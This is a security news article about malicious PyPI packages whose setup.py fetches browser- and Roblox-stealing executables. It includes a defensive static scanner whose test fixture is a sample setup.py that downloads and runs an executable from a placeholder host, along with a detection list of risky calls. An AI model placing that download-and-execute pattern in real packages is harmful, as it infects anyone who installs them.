Developers are lured into installing malicious PyPI packages

August 25, 2022

Twelve malicious packages uploaded to the Python Package Index (PyPI) on August 1 have been used to install malware that modifies the victim's Discord client into an information-stealing backdoor. The backdoor then steals data from the user's Roblox account and web browsers.

Each package has a unique name and advertises different capabilities, including Roblox tools, thread management and hacking modules. These capabilities are only lures: once run, the packages install information-stealing malware on the developer's computer.

At the time of the report, the malicious packages were still available on the public repository, exposing developers to the risk of installing them.

To learn more about this scheme, security researchers analysed one of the twelve packages, 'cyphers'. Its 'setup.py' file carries hidden malicious code that downloads and installs two malware executables, 'ZYXMN[.]exe' and 'ZYRBX[.]exe', from a Discord server.

All of the other packages in the set behave like the first one analysed, except for 'hackerfilelol' and 'hackerfileloll', which each fetch a single executable named 'Main[.]exe'.
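The install-time hook described above works because pip executes a source distribution's setup.py as ordinary Python while installing it. One way to triage a package before letting that happen, as an added example that is not code from the article or from the researchers it cites: download the sdist without installing it (`pip download --no-deps --no-binary :all: <package>`), then scan its setup.py statically for downloads, process launches and executable paths. The two setup.py samples, the URL and the `dropper.exe` name below are constructed placeholders, not the real indicators from the campaign, and the scanner is a heuristic, not a verdict.

```python
"""Static triage of a Python sdist's setup.py before installation.

Added example, not the article's or the researchers' code. Nothing here is
executed or downloaded: the scanner parses setup.py with `ast` and flags
calls and string literals that a build script has no legitimate need for.
"""
import ast
import io
import tarfile

# Constructed sample imitating the download-and-execute pattern the article
# describes. The URL and filename are placeholders, not real indicators.
SUSPICIOUS_SETUP_PY = b'''\
import os
import tempfile
from urllib.request import urlretrieve
from setuptools import setup

URL = "https://cdn.example.invalid/attachments/1/2/dropper.exe"
DST = os.path.join(tempfile.gettempdir(), "dropper.exe")
urlretrieve(URL, DST)
os.startfile(DST)

setup(name="cyphers", version="0.1", packages=[])
'''

# Constructed benign sample for comparison.
BENIGN_SETUP_PY = b'''\
from setuptools import setup, find_packages

setup(name="pkg", version="1.0", packages=find_packages())
'''

# Fully qualified call targets that almost never belong in setup.py.
RISKY_CALLS = {
    "urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen", "os.startfile",
    "exec", "eval", "base64.b64decode",
}
# Substrings in string literals worth a second look.
RISKY_LITERAL_HINTS = (".exe", "http://", "https://", "discord")


def _alias_map(tree: ast.Module) -> dict[str, str]:
    """Map local names to the dotted object they import.

    `import subprocess as sp`            -> {"sp": "subprocess"}
    `from urllib.request import urlretrieve` -> {"urlretrieve": "urllib.request.urlretrieve"}
    """
    aliases: dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
                else:
                    top = a.name.split(".")[0]
                    aliases[top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _resolve(node: ast.AST, aliases: dict[str, str]) -> str:
    """Turn a call target such as `sp.run` into 'subprocess.run'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def scan_setup_py(source: bytes) -> list[tuple[int, str, str]]:
    """Return (line, kind, detail) findings without running the script."""
    tree = ast.parse(source.decode("utf-8", errors="replace"))
    aliases = _alias_map(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _resolve(node.func, aliases)
            if name in RISKY_CALLS:
                findings.append((node.lineno, "call", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value.lower() for h in RISKY_LITERAL_HINTS):
                findings.append((node.lineno, "literal", node.value))
    return sorted(findings)


def scan_sdist(tar_bytes: bytes) -> dict[str, list[tuple[int, str, str]]]:
    """Scan every setup.py inside an in-memory .tar.gz sdist."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                results[member.name] = scan_setup_py(tar.extractfile(member).read())
    return results


def build_sample_sdist(name: str, setup_py: bytes) -> bytes:
    """Construct a minimal sdist tarball in memory (fixture for the demo)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(f"{name}-0.1/setup.py")
        info.size = len(setup_py)
        tar.addfile(info, io.BytesIO(setup_py))
    return buf.getvalue()


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        for path, findings in scan_sdist(build_sample_sdist(label, src)).items():
            print(f"{path}: {len(findings)} finding(s)")
            for line, kind, detail in findings:
                print(f"  line {line}: {kind} {detail}")
```

Because the check never executes the script it is safe to run on hostile input, but it only sees what is visible in the source: a payload hidden in a base64 blob is caught only through the `b64decode` call, and heavier obfuscation will slip past. Two complementary controls: `pip install --only-binary :all:` installs wheels, which do not run setup.py at all (the code can still run when the package is imported), and a package without setup.py is not automatically clean, since a PEP 517 build backend named in pyproject.toml can also run arbitrary code at build time.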

The researchers also assessed the two executables fetched by 'setup.py'. The ZYXMN[.]exe binary harvests data from the victim's web browsers, including Google Chrome, Microsoft Edge, Chromium, Firefox and Opera; the information collected includes saved passwords, browsing and search history, and cookies.

The ZYRBX[.]exe binary, on the other hand, targets Roblox, stealing the user's account cookie, user ID, Robux balance and the premium status of the account.

Separate researchers have also discovered two other PyPI packages that carry info-stealing malware and can modify a Discord client. In that case the malware steals the user's cryptocurrency wallets and Steam and Minecraft account credentials, and also scans for other data such as email addresses, passwords and financial information.

Unfortunately, PyPI's response to reports of malicious packages is considered slow: most malware-carrying packages stay on the platform for many days after being reported before they are taken down.

This dwell time worries security experts, since it gives threat actors more opportunities to victimise users and developers and to spread info-stealing malware.
